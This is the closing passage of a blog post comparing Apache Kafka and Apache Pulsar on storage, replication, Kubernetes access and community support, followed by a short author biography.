As you would expect there are parts of Pulsar that shine, and parts of Kafka that shine too. When it comes to connectivity to external sources and simple querying of the message data, Kafka definitely comes out on top.
On the more core elements of the broker systems, Pulsar offers a lot upfront, especially when it comes to using Bookies to expand persistent storage and the ability to use tiered storage out of the box for free. If you are using frameworks like Kubernetes for deployment then Pulsar's proxy addressing makes broker access far easier, and it can be load balanced if you are running multiple proxies. Pulsar also wins on multi datacenter replication out of the box; the ability to block consumers until a message is fully replicated is a big benefit.
If the features that Pulsar provides are important to you then you really should consider Pulsar – its ease of scale, tiered storage and multi-dc support are compelling features for any streaming application.
However, community support is vitally important also. Access to help when you need it and getting answers from those who have already done those tasks is immensely advantageous when you are deploying a streaming message system. Confluent has invested heavily in supporting the Kafka community and its ecosystem. At this point I would advise anyone wanting to learn and get up and running quickly to consider Kafka.
DevOps Engineer and Developer
With over 30 years of experience in software, customer loyalty data and big data, Jason now focuses his energy on Kafka and Hadoop. He is also the author of Machine Learning: Hands-On for Developers and Technical Professionals. Jason is considered a stalwart in the Kafka community and is a regular speaker on Kafka technologies, AI, and customer and client predictions with data.
The post Apache Kafka vs Apache Pulsar appeared first on digitalis.io.
]]>